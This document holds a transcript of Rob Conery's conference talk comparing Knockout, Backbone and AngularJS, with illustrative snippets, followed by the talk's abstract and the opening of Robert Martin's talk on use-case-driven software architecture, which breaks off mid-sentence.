So in here, I'm just going to say, HTTP.get API. And then when it's done, what comes back is what's called a promise. It's a function that fires whenever you're finished. So you have to pass a callback in here. And I'm going to say result. And so how am I going to get data down to the view, which I haven't even done yet? I don't even have any template. To get data down there, you use scope. And what scope is, is this fun little object that is basically empty. And you can attach functions to it. You can attach data to it. You can do whatever. And it's exposed implicitly to your view. So let's take a look at that. So I can say scope.title equals result.title. And then scope.description equals result.description. And yeah, that's it. OK. And let's see. And so now to work with this, I've wrapped this section here saying that this div tag in my DOM is controlled by my controller. So now I'm free to do all kinds of stuff. So I can come in here and work directly inside the DOM with these funky tags. And I can say title. And then here I can say description. And that's that. All right, what do you think? Wait, did I spell that right? No spelling errors? Oh boy. Boom! That's good. That was not a lot of code, was it? To do the same thing that Backbone did in a whole bunch of code. So let's compare and contrast these things really quickly. Put this here. That's great. So the first one up top here is knockout. There's a little more machinery that goes on with knockout. And it's kind of just brute force. And you want some data, then you've got to use jQuery. Go to the server, grab it, and do it. To me, I like this. I like it a lot because there's not a lot of noise between me and the data and my DOM. I just have to focus on making these things observables if I need them to be observable. And then I've got to focus on doing the right data bind in the DOM itself. So the data binds that you can do number about 20 or so. And once you memorize those, you're on your way. So the API is very slight and it's very usable. The way you get yourself in trouble with knockout is if you try to start doing complex things, you're tempted into trickery. That's something that I've noticed at least. With backbone, granted, it's a little bit older. And so a lot of what you see here hasn't changed much because a lot of people are using it. And the strange thing about backbone is in terms of popularity, it dominates. It just dominates. And for me, learning backbone was a massive mind challenge. But once I got the incantations down and I failed about a zillion times, I started to understand how it all went together. This is where I started to get a flavor of evented programming. And this is actually where I still kind of like backbone. So look at this right here. The way that this view is rendered, as I mentioned before, is it reacts to a change on the model. And that's the way classic MVC has always kind of worked. Whenever the model data changes, the view refreshes itself. This scales out really well, especially if you have a page with a lot of views on it. And when one model changes, it ripples out across the pages, and that's pretty fascinating. This stuff right here is really just a pain. But the nice thing about it is if you don't want to use their built-in templating engine and you want to use handlebars or some other templating engine, you can. And finally, there's Angular, which is bleedingly simple.
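And the Angular version of the same task, assembled, is roughly this. The controller here is just a function declared in the page, a style AngularJS 1.x supported before modules come into the picture later in the talk; $scope and $http are the real service names, which the transcript renders without the dollar signs, and .success is the 1.x-era callback (later versions use .then):

```html
<div ng-app>
  <div ng-controller="MyController">
    <h2>{{title}}</h2>
    <p>{{description}}</p>
  </div>
</div>

<script>
  // A controller is just a function; Angular matches the parameter names
  // to the services it knows about and passes them in.
  function MyController($scope, $http) {
    $http.get('/api').success(function (result) {
      // Whatever lands on $scope is visible to the markup inside ng-controller.
      $scope.title = result.title;
      $scope.description = result.description;
    });
  }
</script>
```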
But if alarm bells are going off in your head right now thinking, well, that makes a neat demo, but how does it work out in the real world, we're going to talk about that later on. Anybody have any questions so far about what you've seen? Shout them out if you do. This is a wide-open session. How do those skill-friendly students be parameterized? Say that again. Those says skill-friendly students be parameterized. How does Angular know what you're asking for? Good question. So the question is, how does Angular know what you're asking for when you, is that right? How does it know what to do and how does it know what you're asking for? The trickery comes because Angular owns your DOM. The minute you say this is an app or this is a controller, Angular takes over and now you're working with an Angularized DOM, if that makes sense. So when you ask for certain things in a function call, so I mentioned that this is my controller, well, it knows it's my controller right here. So it's going to instantiate that for me. Once it instantiates, it's going to look at the arguments list and it's going to match it up with providers that it has in memory. So here's something fun about Angular is, I was going to leave this to the end, but I'll just say it now. It's all fun until you try and minify your JavaScript code. When minification will go in and change all your variables to A's and Z's and B's, well, you can't do that with Angular. These have to have exact names. And that's a lot of fun when you minify your JavaScript code and nothing works because A provider is not present. Oh, good. Thank you for that. So that's actually, that's a bit of a steep learning curve. Did I answer your question? Yeah. Absolutely. Yeah, it's magical. Say again? No, it's not. The question is, is my controller a global? Yeah. No, it's not global to the window in the JavaScript memory space, so it's still confined to itself. One thing I haven't showed you yet, which is what I'm about to, is that all of this gets wrapped into a module. And so that contains it if that makes sense. Anybody else have a question? Okay. All right. Let's move on here. 28 minutes left. All right. Let's really quickly, let's see. I wonder if I can skip ahead here. I'm going to go out of order. Yeah. Let's take a look at saving data, because that's one that I really want to get to. And so let's take this out here. And goodie. All right. So the first thing I'm going to do is I want to work with knockout. And knockout's great if you want to have two-way binding, as you guys saw. I updated a text box and the thing over here updated so it's DOM aware, so that's fun. But how do you actually work with data? Like if you change something here in a text box, how do you save it back to the server? Well, knockout just works with jQuery and off you go. So if you know jQuery, then you're good to go. So let's take a look at this. So I'm going to create a monkey model. And let's see. I'm going to do the same thing I did before. I'm going to pass in initialization values. And let's see. Are you guys familiar with this aline cantation? Var self equals this, or var that equals this? This is, I'll just say this really quickly. If you're not a daily JavaScript developer, this might look weird. JavaScript is a highly functional language, which means you can take a function, attach it to a variable, and pass that variable around. So when a function is executed, it's executed in a context. 
So it'll bind itself to whatever's calling it, and basically take its scope from that, if that makes sense. If you pass it around as a variable and you end up calling it arbitrarily somewhere, it'll bind itself to the global namespace unless you specify otherwise inside of the function itself. And if that confuses you, welcome to JavaScript. So what I'm doing here is I'm setting the scope. Setting the scope right up top to a variable. So if anything changes it within the body of the function, I still have a reference to this in, wow, what a nightmare. So we're going to return this. Sorry, return self. So here I'm going to say self.title, excuse me, self.name. And I'm going to be using this thing, which I didn't really explain very much before. This is knockout observable, and the interesting thing about this is this is just telling knockout to watch this value, and that's that. And so it tracks the variable, it tracks the value that you pass in whenever it changes. It ripples the stuff to anything that's listening to it. So I'm going to instantiate this with vals. Let's see, where am I? Yep, vals.name. Self.setname, and it's going to be a function. Right. I'll explain all this in just a second. Okay, so in my code in the back here, I'll just show this to you really quickly, I have a path here where if I pass something in, this is again in Node, if I pass in something to monkey, it'll just set a name inside Redis, and then it's going to pass back whatever the name was changed to. So I just want to show you that there's no magic going on back there. So what are we doing here? Well, what we're doing with knockout is we're basically saying you're going to observe the name, this value that I gave you, we're going to observe this. And if it changes in the DOM, I want you to change it here inside of this variable. And then when I call the setname function on the DOM, which I'm going to do in a second, this is just a straight up function, I'm going to pull that value out of the name variable and you do this by invoking it. And that is weird. But that's just the way knockout works, because you can't arbitrarily assign values in JavaScript, it's a dynamic language, it'll get confused. So to get a value out of name, I just say self.name(), notice I don't have to use jQuery to go out and interrogate what's in the input box. It'll just work because it's binding back and forth. Next I'm just going to post off with jQuery and I'm going to send the data in and I'm going to get something back. All right, so how is this going to work here? I've got to kick up my, let's see, where is it? There we go. It's type equals text. And I'm going to do the magical databind. Databind is going to be value is name. And then we've got a button. Go. And, okay, good. So this is where it's really fun to start working with knockout. You might be thinking, where's the form? If you're going to do a post, how can we not post anything? And this is where you kind of start to shift your mind away from looking at an HTML page and thinking forms and posts and refreshes and you're starting to think this is actually a desktop kind of experience. You're binding controls to stuff on the back end here. If you're a classic, not class, but if you're an ASP.net person and you do web forms, this is starting to become your code-behind right here. Except it's JavaScript on the front page. That really helped me to understand what I'm trying to do here. So now what I need to do is I need to call databind.
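For orientation, here is roughly where this save-the-monkey example ends up once it is all wired together. The endpoint paths are assumptions; the pattern is the point: an observable for the field, a plain function for the click handler, and jQuery for the actual HTTP work:

```html
<input type="text" data-bind="value: name" />
<button class="btn btn-success" data-bind="click: setName">Go</button>

<script>
  var MonkeyModel = function (vals) {
    var self = this;                       // capture the view model so callbacks keep the right scope
    self.name = ko.observable(vals.name);  // two-way bound to the input above

    self.setName = function () {
      // Reading an observable means invoking it: self.name(), not self.name.
      $.post('/api/monkey', { name: self.name() }, function (result) {
        self.name(result.name);            // push whatever the server sends back into the observable
      });
    };
    return self;
  };

  $(function () {
    $.get('/api/monkey', function (result) {
      ko.applyBindings(new MonkeyModel(result));
    });
  });
</script>
```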
I'm going to bind the click handler here to set name. And that is that. All right, so let's see if this, oh, let's see. No, I can't do that. I have to go here. Here's a new monkey model and that's right. I got to wrap this stuff here. Use jQuery and the DOM loads up. And I'm going to do a get from my API and function results. There we go. Pass the result in and then ko.applybindings. And check that. Yep. Okay. Hopefully this will work. All right. Didn't work. What? Monkey model. Say it what? Yes. Thank you. Yes. That's the name of my monkey, Boppy. Don't ask. Okay, so that just shows up. And that's good. So let's see if we can change the name to hippity hop. And so we change it. Boom. Wow. Almost, almost for, well, no, never mind. So that just worked. And that's not so bad, but that's basically your experience when you're working with knockout. Kind of manual. You know, the data interaction with knockout, the data story with knockout, they don't have one. As I mentioned, just use jQuery. Now, there's other things I could do here if I wanted to. I could have a full model that has a subscription thing going whenever you change something, it hits the server and all that stuff. As manual as this seems, I find it fascinating just because I can control it completely and there's not that much abstraction to go through. Anybody have any questions on this before I flip it out? Okay. Let's take a look at this with Angular. Not good. I got 20 minutes left. That's awesome. All right. So with Angular, we're going to do the thing that we did before where straight away I'm going to create a model or a controller. And notice this. I'm using WebStorm, by the way. That's what this IDE is. It's from JetBrains and I love it. It's only $49. It's crazy. And you can plug in. So if you start working on your Mac and you want to have a great IDE that shows you all the bindings that you need to work with Angular, this is great. I really enjoy it. So this helped me a lot to learn Angular. So I'm going to set this to my monkey controller. And then down here, let's see. Where am I? Yeah, let's put this up here. So the first thing I want to do is I am going to come in here and I'm going to set this to text. This starts to feel a little bit like Angular, excuse me, like knockout with data bind. Except instead of saying data bind with some arbitrary expression, Angular now owns the DOM. So I can work directly with attributes. So I can say ng model and I can say this is just the name right here. Monkey.name. And then we're going to put in the button again. Button.button.success. And then we'll say save here. And on this, I'm going to do the same kind of thing I did with knockout except this is explicit as an attribute instead of a data bind thing. So I'm just going to say set name. Like that, right? All right. With this example with Angular, I'm going to do the simple thing first and then I'm going to expand it out a little bit so you guys can see how you're actually going to be working with Angular. Actually, I'm going to just do the right thing straight off to answer your question there about is this global and how is this handling what's happening. So normally what you do with Angular is you work with what's called a module. And so I'm just going to call mine app. And then you ask Angular to create a module for you and you give it a name. So I'm going to call mine monkey app. And the next thing you need to do is tell it what dependencies it's going to be using. 
Here I don't have any dependencies straight off the bat, but I'm going to use one. And you don't have to do this normally. This is where Angular gets confusing. If I was to take this array out, it won't work. It needs to see an empty array for some ridiculous reason. So I'm actually going to be working with another external library. So I want that library available to Angular. And to make it available to Angular, it needs to be injected. Angular is injection based, dependency injection. So the library I'm going to put in here is ngresource. Where's that library coming from? What's coming from this file right here? So that's kind of a nice feature of Angular. It doesn't dump the kitchen sink on you. If you want to work with the ngresource library, just add the script tag and then you'd have to tell Angular you're going to work with it. Step one. So then I am now going to kick up our service. I'm going to have a monkey service. So I am going to say app.service. And I'll just call this monkey service. And this is simply going to be a function. And the function is going to take resource. It's going to be injected with that. And then let's see. All right. This.monkeys equals right. All right. This is where things get fun. So now I got to do my monkey controller. So instead of creating the monkey controller as a straight up function, I'm actually going to pass a function into my module. And I'm going to tell it that its name is monkey controller. Is that confusing, guys? It should. So I'll explain all this in just a little bit. So I have to, right, so I need to create a function here and I have to pass in some dependencies. The first thing, I need to work with a scope because I want to pass data down to my view. The second thing I'm going to do is I'm going to pass in my monkey service that I just created. And so when the thing loads up, I am going to simply say scope.monkey equals monkey service. And I believe it's just get, right? Yes. Right, monkeys.get. And then scope. Since I have a click thing, I got to do a set name function, scope.setname. And that's just going to be a straight up function. And I'm going to save our monkey equals new monkey service.monkeys. And I'm going to say the name. I'll explain all of this in just a second. And the name is on the scope that I can pull off. Scope.monkey.name, correct. Come on. Okay. Just checking myself. Okay. What did we just do here? Well, I'm going to say straight away that it doesn't need to be this much code. If all I was going to do is try and save a monkey's name, that's a weird sentence. If all I was going to do is that, then I wouldn't be writing all this code. But when you start writing bigger apps with Angular, you're going to want to structure things this way. First thing I want you to notice is how much you're working with injection. Notice that right here I called this thing monkey service. That's just a string. But down here, I'm using it as an actual variable. And that is something that is really wild. Because what Angular does is when you declare a service, like I did right here, what it does is it goes in and instantiates this straight away. And it creates it as a singleton. And that's going to be used everywhere around your app. That's a neat thing. And it's also a crazy thing. Because if you do some stuff in the service where you're expecting things to be instantiated and changed, never. It's a singleton and it stays that way the whole time. 
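Assembled, the Angular pieces being built here look roughly like this sketch. The module, service, and controller names follow the demo; the /api/monkey URL is an assumption, and $resource is the real name of the helper that ngResource provides (the transcript drops the dollar signs):

```js
// One module to contain everything; the array lists the modules it depends on.
var app = angular.module('monkeyApp', ['ngResource']);

// A service is instantiated once and shared everywhere it is injected.
app.service('monkeyService', function ($resource) {
  // $resource hands back an object with get/save/query-style helpers for a URL.
  this.monkeys = $resource('/api/monkey');
});

// The controller asks for $scope and the service by name; Angular supplies both.
app.controller('MonkeyController', function ($scope, monkeyService) {
  $scope.monkey = monkeyService.monkeys.get();   // fills itself in when the GET completes

  $scope.setName = function () {
    var monkey = new monkeyService.monkeys({ name: $scope.monkey.name });
    monkey.$save();                              // instance methods on a resource are $-prefixed
  };
});
```

And the markup that drives it, roughly:

```html
<div ng-app="monkeyApp">
  <div ng-controller="MonkeyController">
    <input type="text" ng-model="monkey.name" />
    <button class="btn btn-success" ng-click="setName()">Save</button>
  </div>
</div>
```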
So by using the resource library, what I'm doing is I'm saying there's something off in the cloud that I want to talk to and get data from and push data back to. And I get all of these fun methods like get. I can just call get on monkeys. And monkeys again right here is a resource. I'll call get. It's going to go out and get a request for me. It's going to return a promise. It's going to attach that promise to the scope. That scope again is just a transport mechanism to shove data down into the view. And it works directly with promises. So I don't have to do any callback craziness, which is a fun thing, is Angular. And then the next thing I do with the scope is I can create a function and just attach it to the scope and now make that available down in my template right here. So I can call set name and it knows what to do. Inside set name, I am just creating a brand new resource. I'm just calling new on monkeys and I'm passing in some initialization data. I want to set the name there and then I'm calling save. That's going to go ahead and post it back to my server and we're good to go and I hit an alert. What do you think? Maybe. Maybe not. Monkey controller is not a function. Got undefined. Oh, right. Ah, because I have two things wrong. One, I have to declare. So what just happened there? So Angular came down and as you notice, it started with the DOM. It took in everything in the DOM and then it's going to go back and hit the JS, which is interesting. So it started with the DOM and said, okay, well you declared a controller. Well I'm going to go and try and find that controller. So I tried to look for a function called monkey controller. I don't have one. What I have right here is a module and I have a function inside of it that has the name monkey controller. So to get around this, all you need to tell it that it's using a specific app, a monkey app. Now it's going to go and try and find this app right here called monkey app and then it's going to go, oh, okay, I'm going to look for the controller in here. Let's see if I'm lying. So that's the way that works. So Hippity Hop is a really silly name. Let's change it to just George and hit save. Yes. Let's see if that works. Yeah, if that works. You hopefully are noticing that there's parallels between what I did with knockout and what I started doing with Angular. But the difference is that with knockout, if I wanted to structure things better because I know my app is going to grow, it's up to me. It's up to me to kind of think it up like what do I want to do? With Angular, notice that I'm doing something completely different. I'm now working with the notion of a module. And inside of a module, I can have services, I can have factories, I can have all these things and I can inject those services into controllers. So I'm starting to see separation patterns that the framework offers. So that's actually a fascinating thing to think about because now you can scale complexity very gracefully. Does anybody have any questions about this? You must. Someone's got to have a question. Yeah. You said something about minifying. Yes. How would you solve that? Good question. I should have probably answered that. So the question is, well, minification is a problem. How do you solve it? And so what you do with minification is anytime you're injecting anything, a fun little process you have to go through, anytime you're injecting anything like you're seeing right here, you have to enclose it with an array and then you start it off by saying resource. 
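The minification-safe form being described is Angular's inline array annotation: the string names travel with the function, so the injector can still match things up after a minifier renames the parameters to a and b. A sketch, using the same pieces as above:

```js
app.service('monkeyService', ['$resource', function ($resource) {
  this.monkeys = $resource('/api/monkey');
}]);

app.controller('MonkeyController', ['$scope', 'monkeyService',
  function ($scope, monkeyService) {
    // body unchanged; only the registration changes
  }
]);
```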
Just like that, I think. I might be a touch off on that syntax, but that's basically what you're supposed to do. Actually, is it? Oh, whoopsie, I put the thing down. That's what Skeet would say. Whoopsie. There we go. Yeah. This is weird. But it's something you learn to do and it's probably something I should have done straight away. There's other ways of doing this. You can work with the injector if you want, but this is how you avoid minification hell. And unfortunately, when you're working with Angular, you don't know right off the bat that that's going to happen to you. Any other questions? Yeah. Yes, the question is, can you have more than one module? You can have lots of them. And this is where Angular starts to get really interesting. With the injection pattern that you use with Angular, you're more focused on building components. And this is what I was talking about with Tom Dale yesterday who's on the Ember team. They're focused on URLs and all this stuff that happens in the DOM. Angular is focused on components. And when you start using it more and more, you start thinking about reusability a lot. One thing I haven't showed you is a thing called, what are they called? Directives. You can create a directive that basically encapsulates functionality that you can drop into the DOM with its own HTML tag, which is crazy. And it will output stuff. A directive can have its own controller, its own template. It's really nuts. And so the neat thing with a module, when you start having modules like this, you might look at this and say, well, I work with monkeys and I also work with tigers. Maybe I'm going to abstract this now to an animal app. And then I'll tell it when it's going into configuration what animal it's dealing with. And then you can take that module and you can inject it into another module. And all you have to do is say, up here, you're going to also now work with my monkey app. And that's where your head starts to spin with what Angular is trying to do with its injection pattern. Did I answer your question? Cool. You have a question? Yeah. The question is, what do you think the best site and the best way is to learn Angular? And I'm going to try and be impartial and a nice guy, but Tekpub, of course. No, we do have a video on it, what does it cost? $15, I believe. There's another site called egghead.io, where I got off the ground learning it. I highly recommend you just watch it. It's about 30 videos and they're 10 minutes apiece and they're awesome. OK. We have eight minutes left, so I set out to do five things and I totally lied about that. And that's OK because, you know, it's my talk. What I really want to do is I want to show you some working code and let's go find it. Where did I put it? Right. OK. So let me just really quickly show you tekpub.com. OK. So this is Tekpub's live site. And this little spinner thing here, no, that's a lie. Let's go to here. This thing right here. It's powered by knockout. And it's noticing that I'm logged in. And so what it's doing is it's going back to our fulfillment server. It's taking my ID and it's saying, oh, Rob's here. And then the API comes back and shows a dump of data. And so it's telling me I can stream this. So I can go click this and I can go over to our streaming page. And then boom, the streamer shows up because it sees that I'm logged in. Again, powered by knockout. And this is our Shopify site. Shopify doesn't allow you to work with their, mess with their server stuff too much.
It gives you some variables to play with. But I wouldn't have been able to do this if what it gave me. I don't have a URL, in other words, right here that's ready. I'd only want to show this URL for people that are logged in and that own it. So there's a lot of logic I have that I need to implement. That's all back on our delivery server. I just ping it with knockout and say, can they come in? So that's thing one. I'll show you this code in just a minute. The other thing, this right here, is all an Angular app. And one thing I didn't show you is the routing. But here I can show it to you. This is our administrative back end, or excuse me, our customer fulfillment back end, that is up on the knockout site. This is using resource and all the things, services and injectable stuff. And if I click on my videos, it'll hit the server and come back and say, here's what you can watch. And here's all the videos. I can download them from here if I want. Subscriptions and coupons and I can click renew. So this is a single page app in a classic sense. This is why I like single page apps. I could not have built this any other way. In fact, if I couldn't have done this with Angular, I couldn't have used Shopify. Because we moved to Shopify from an old system that I built by hand. Moving to Shopify allows me to focus on videos and not selling stuff, which is great for people because then they could watch more videos. But one thing I couldn't do is pull in all of the old orders for my customers and all the things they own. So what am I going to do? I got to show them that stuff. Well, working with a single page app allowed me to do that rather easily. I did run into trouble, but we can talk about that another time. So I want to show you, in fact, if you guys want to know what trouble I ran into, please come up here. I'll show you. It's all with internet explorer. I wanted to show you. Oh, that's right. Let me really quickly open this up here. Open recent. Oh, come on. Just give me one second. I seem to have lost it. There it is. This is my Angular app that you just saw. I put it on just one page because I'm lazy. So the amount of code to the fire, that whole thing is 195 lines of code. And I find that pretty compelling. And this is one reason that I really have enjoyed Angular to come all the way back to the beginning where I said, this is my journey. I have learned enough JavaScript to know that I don't want to dabble with it more than I have to. I know that I suck at programming, if you can't tell that already. But Angular actually made it easy for me to slide up the complexity scale if I needed to add a single thing I could. So for instance, if you have a Stripe subscription with us, it's all the few lines to go and cancel it. Bam. I send this back to a fulfillment server and it's done. I have a nice message and that's that. I have a single controller in play. I have, let's see, let's see what this is. No, I'm sorry, I have a single, I have two controllers. Don't I have more controllers? Ignore me. I don't know what I'm saying. I have a service up here that I inject down below and you can see right here I have the minification stuff handled as I mentioned before. So all this gets crumpled down and minified and shoved up to Shopify. And so it's 195 lines of code and it enabled me to do something good for my business and that to me is the ultimate payoff. So we're coming in to the final bits. Does anybody have a question that they want to ask about anything? Shout it out. Say it one more time. Oh, yeah. 
The question is testing and how do you test Angular and all these frameworks? Well, there's a ton out there and I was going to get into it, but once you start talking about testing anything, you start talking about writing tests and then people will say, you shouldn't do that dude and then you get totally lost. So with testing Angular, there's a couple of frameworks. There's one called Karma that comes from the same team that made Angular. So it's a great thing to use and in fact they have two ways to test it. They have you straight up unit tests and what Karma will do is it'll run Node.js and it'll pull in your code and run it inside Node.js, which is freaky and then it will somehow allow you to test it against headless browsers that it also has access to. Don't ask me, I don't know. So they have that. They also have an acceptance test engine and it's called, does anybody know the name of it? Shout it out if you do. It will actually scan your DOM and click on things and so you just orchestrate it. Scenario runner is what it's called and it comes bundled. So if you want to get started with Angular and you want to just see how to do it all, there's a site called Angular Seed, it's github.com, I believe, slash Angular and then Angular Seed and then you download it and it's ready to go. The testing framework is plugged in. All the patterns are kind of there and explained, which is a lot of fun. I, to be honest, I just use Jasmine and the neat thing about using Jasmine, which is just a straight up test runner, is this stuff right here, these are just regular objects and so I would just mock stuff by hand and so to, and then just inject it straight in whenever I wanted to test this service. So I'd instantiate the service and I'd create an object that had a thing called get whatever on it and it would return an array and that was that. It was as easy as can be and that's one of the reasons I really like Angular, it's just working with basic objects. Answer your question? Okay. Anybody else? Okay. Thank you for putting up with me and my missing voice and I hope you guys enjoyed it.
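As a footnote to that testing answer, the hand-mocking approach described might look something like this in plain Jasmine. It assumes the controller is kept as a named function (and registered with the module separately) so the test can call it directly; the fake service only needs the one method the controller touches:

```js
describe('MonkeyController', function () {
  it('puts the fetched monkey on the scope', function () {
    // Hand-rolled fake standing in for the real service; no Angular, no server.
    var fakeService = {
      monkeys: { get: function () { return { name: 'Boppy' }; } }
    };
    var scope = {};

    MonkeyController(scope, fakeService);   // just a function call

    expect(scope.monkey.name).toBe('Boppy');
  });
});
```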
|
If you're a web developer, chances are you've heard the terms "Single Page Application" and "Javascript MVC Framework". But what do these terms mean - and should you care? And what are these frameworks? In this talk Rob Conery explores 3 popular frameworks (Backbone, AngularJS, and Knockout) from a conceptual level, as well as a pragmatic one. Rob will explore the strengths and weaknesses of each with lots of code (and some hair-pulling) along the way.
|
10.5446/51497 (DOI)
|
Hello, everybody. How fast are we moving? Thank you. In reference to what? That is the correct answer. The question about how fast someone is moving cannot be answered unless you know some other frame of reference, unless you compare it to some other frame of reference. We do not appear to be moving with respect to each other very fast. On the other hand, we are on the Earth and the Earth is turning at a very sizable rate of speed. Of course, the Earth is roaring around the Sun at a certain speed pretty fast. The Sun is tearing around the galaxy at a really fast speed. The galaxies are moving together, our particular two, Andromeda and Milky Way, are moving together at a very fast rate of speed. Most of the galaxies are actually tearing apart from each other at a very fast rate of speed. So the question about how fast we are going is relative. This is a principle that was first expounded upon by Galileo. Galileo said, if you are on board a ship and you're in a cabin with no windows, if the sea is flat and you cannot feel the waves, then there is no experiment you can perform inside your cabin that will tell you how fast the ship is moving. Some guys in the 1830s started doing experiments with electricity and magnetism. They had recently discovered that there was a link between the two. Prior to that, nobody had known that they were related. And one of the things they discovered was that there was a mathematical relationship between the unit of electric charge and the unit of magnetic charge. It turned out that if you divided them in just the right way and did the unit analysis, you got meters per second. You got a velocity. When they measured the physical quantities accurately, they found out that that velocity was 3 times 10 to the 8th meters per second, the speed of light. Can you imagine the chill that went down their spine as they did that math and they saw this constant pop out that they knew very well? What does electricity and magnetism have to do with light? No one knew the answer to that question. But a more disturbing aspect was that that division, that little experiment violated Galileo's principle because in an inside room without any windows, you can do that experiment and a velocity comes out relative to nothing. No frame of reference implied. The physicists of the day thought, well, we got to have some kind of frame of reference. There's got to be a frame of reference. Let's invent this stuff called ether. It permeates all of space. It's frictionless. It's massless. And the waves of light wave the ether. Obviously, waves must wave something. Something's got to be waving if there are waves. And so the waves of light wave ether. And they came up with brilliant experiments to detect the ether, all of which failed horribly. It's difficult for us to imagine now how wildly disappointing and extremely disturbing these experiments were right around the 1900s when they tried to detect the ether. And every experiment they did failed. They tried experiment after experiment after experiment. They spent really large amounts of money comparatively. This was the first really big science. They had whole rooms full of concrete equipment and big massive pads that were isolated from vibration and the light sources that were really perfect. And they could not see the ether. It took Einstein in 1905 to say, well, there's no ether. And he made this remarkable statement that everybody's kind of going, well, how did he come up with that? 
He said, there's no frame of reference for the speed of light. No frame of reference at all. Everyone will always measure light going at exactly the same speed. No matter how fast the source of the light is moving, no matter how fast the measure is moving, any time you measure a beam of light, irrespective of any other motion, you will measure the speed of that light past you at three times 10 to the eighth meters per second. And from that postulate, he came up with the special theory of relativity. Has anybody read that paper on the electrodynamics of moving bodies? 1905. This is a five-page paper, maybe seven pages. It's very short. Nothing more than high school algebra. There's no real interesting math in there. Einstein wasn't a mathematical genius at the time. Maybe he never was, but at least at the time he was. And he just came up with this bizarre idea, and he followed the very simple mathematical pathway to come up with E equals MC squared. E equals MC squared, interesting equation. Energy equals mass times the speed of light squared. But energy is equal to mass times velocity squared, one half mass times velocity squared, and velocity is relative, which means that energy is relative, which means that mass is relative. We don't have an absolute mass. Our mass is relative to another frame of reference. I do not mass at 205 pounds. I do that on the earth, but by some other frame of reference, I have a completely different mass. How can my mass be relative? Mass must not be what we think it is. Well, I'll leave you with that thought, because we have other things that we need to talk about. Architecture. The genesis of this talk was about three to four years ago, and it came about because my son, who is the founder of this company, I now work for him, came to me with an application written in Ruby, and he showed it to me, and I noticed something. And it was the first time I had noticed this something, but it was a common something. It was common to most Ruby applications. So I went back six or seven years to a Ruby application that I had written, and I noticed the same thing. This is the high-level directory structure of the application I wrote in 2004-ish timeframe, 2005-ish timeframe. And notice the directories. At the highest level, we've got substitute, whatever the heck that is, and then immediately below that, we have these directories that have very familiar names, controllers, models, views. This is what I saw when my son showed me his application. This is what I did when I did my Rails application, but on this particular event, I looked at it and realized there's something wrong with this. Why is this application at its highest level telling me that it is composed of models, views, and controllers? Why isn't it telling me what it does? At its very highest level, why isn't it telling me what it does? Why is it telling me how it's made? I thought about that for a minute, and I began to realize something. This application was put together using a common web framework, Rails. Some of you probably use another common web framework, either in.NET or in Java or whatever platform you are using, and very likely you have some similar kind of directory structure which exposes the elements that that framework demands. Why is it that the first thing I see is the framework? Why does the framework dominate? Why does the web dominate? Here's the thing that was bothering me. The web, for all its complexity, for all its importance, the web is a detail. It's not the essence of our application. 
The web is an IO channel. Why would we structure our application around an IO channel? Why would the IO channel dictate the structure at the highest level of our application? There's something wrong with that. There's something wrong with that idea, because I went and I got some blueprints out, and I looked at those blueprints, and I found, for example, this one. This is the blueprint of a library, and if you look at it, it's obviously a library. There are bookshelves that hold journals. There's a circulation desk. There's a video collection. There's this area over here with PCs on it that you can look at. There's reading desks. This is a library. The picture tells you it's a library, and if that doesn't convince you, this one will, that's a church. It's obviously a church. The architecture of the building tells you not what it's made of, not what its architectural frameworks were. It doesn't tell you that it's a concrete building. It doesn't tell you that it was built with hammers and saws. What it tells you is its intent. Architecture is about intent. This is not a new idea. This is an old idea. It's an idea that has been around since probably the 70s or 80s. It came to a certain fruition in the 90s. Some of you know who this guy is. His name is Ivar Jacobson. Ivar Jacobson got involved with the whole Rational suite of tools a while ago. He was one of the three amigos who worked with Grady Booch. Who was that other guy? I can't remember his name. Who did the UML and the Rational Unified Process. All of that. But before he did that, he and his cohorts wrote this book. This book came out in 1992. Object-Oriented Software Engineering. I remember when it came out. We were all very excited. This is 20 years ago. We were all very excited about this book because it was the first time someone had used software engineering principles to describe object orientation. 20 years ago we were all very, very excited about object orientation. What Ivar said in this book was that use cases drive the architecture. Does anybody remember the whole use case fiasco? The horrible nightmares of use case forms that happened during the 90s and then into the 2000s. Every consultant out there came up with some new form for how to fill out use cases appropriately. They involved these blanks where you had to fill in the primary actors and the secondary actors and the tertiary actors and the preconditions and the post-conditions. They had it all laid out for you. It was a nightmare. But that's not what Ivar was talking about when he wrote this book. A use case written by Ivar might look like this. A use case is a description of an action that a user will perform on a system. It describes how the system processes that action and what data is returned by the system. Here I've got a create order use case. This use case might be part of an order processing system. I describe the data that would go into this use case. Customer ID, shipment destination, payment information, customer contact info, shipment mechanism. Notice that I am not specifying any detail about this information. I don't care about the detail right now. All I want to do is say, hey, there's some kind of shipment stuff going in. I don't know what it looks like. Maybe we'll figure that out later. Then next, I talk about what the system does with that data. Order clerk issues create order command. That's actually not part of the use case. That's what starts the use case. System validates all data. Well, that would be the data being validated up here.
Notice that I don't say how it's being validated. I just say, eh, somehow it validates it. I don't know how. System creates order and determines order ID. I presume that's some kind of database action, the identification of an ID, but I'm not going to say that here. The system delivers the order ID to the clerk. It doesn't say how. You could easily imagine that these fields of data are gathered on a web form. You could also easily imagine that the order ID being delivered back to the clerk is being delivered on a web page. But nothing here says that. Nothing here binds you to the web at all. There is no indication of the web here. The I.O. channel is completely gone. I don't mention it at all. This is the kind of use case that Jacobson was talking about in 1992. A use case, not a web use case. Then Jacobson went on to describe how this could be broken up into a set of objects. He said, eh, you could take that use case and you could put it in an object. There could be a create order use case object. I call it an interactor here. He called it a control object. I don't like to call it a control object because that makes it confused with model view controller. Other people have said, you know, Bob, you could have called it a use case object. This sounds like a very good idea to me. Maybe I should change the name from interactor to use case. In any case, this is an object. This object encodes the processing rules in that use case. Somehow. I don't care how. We'll figure that out later. There must be a method on this object, a method, something like execute. What pattern is that, by the way? If you've got an object that's got a method called execute, what design pattern is that? Command pattern. Yeah, there's probably a command pattern. So I've got this interactor. It's got a command and an execute. When I call execute, it does what is necessary to execute the use case. But notice I've got some words here. Interactors have application-specific business rules. What does that mean? There are two kinds of business rules in an application. And keeping them separate is necessary for a good architecture. The one kind of business rule is the kind of business rule that is particular to the application being executed. It wouldn't make sense in another application. But the other kind of business rule is the business rule that transcends the application and could be executed in many different applications. Sometimes we call the first kind interactions, which is why I called this an interactor. The communication back and forth between the user is often application-specific. Whereas the lower-level business rules, the more fundamental business rules are application agnostic. Where do we put the other kind of business rule? Jacobson put them in a thing called an entity. Nowadays we would call this a business object. If you're a fan of Eric Evans, this would go in your domain-driven design. This is part of your domain model. The interactor is not. The interactor is part of your application model. These two models are separate. The interactor tells the entity what to do. In fact, there are probably many entities involved with creating an order. There might be a customer entity and an order entity and a product entity. And the interactor would control all of those entities in the context of creating an order. The last kind of object that Jacobson talked about 